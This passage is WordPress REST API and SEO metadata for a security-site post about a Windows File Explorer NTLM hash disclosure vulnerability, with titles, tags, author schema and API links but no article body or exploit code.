redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-05T13:40:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28896\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28896","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-05T18:53:16&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by...","og_url":"https:\/\/zero.redgem.net\/?p=28896","og_site_name":"zero redgem","article_published_time":"2025-12-05T13:40:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28896#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28896"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497","datePublished":"2025-12-05T13:40:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28896"},"wordCount":2633,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28896#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28896","url":"https:\/\/zero.redgem.net\/?p=28896","name":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-05T13:40:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28896#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28896"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28896#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28896","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28896"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28896\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}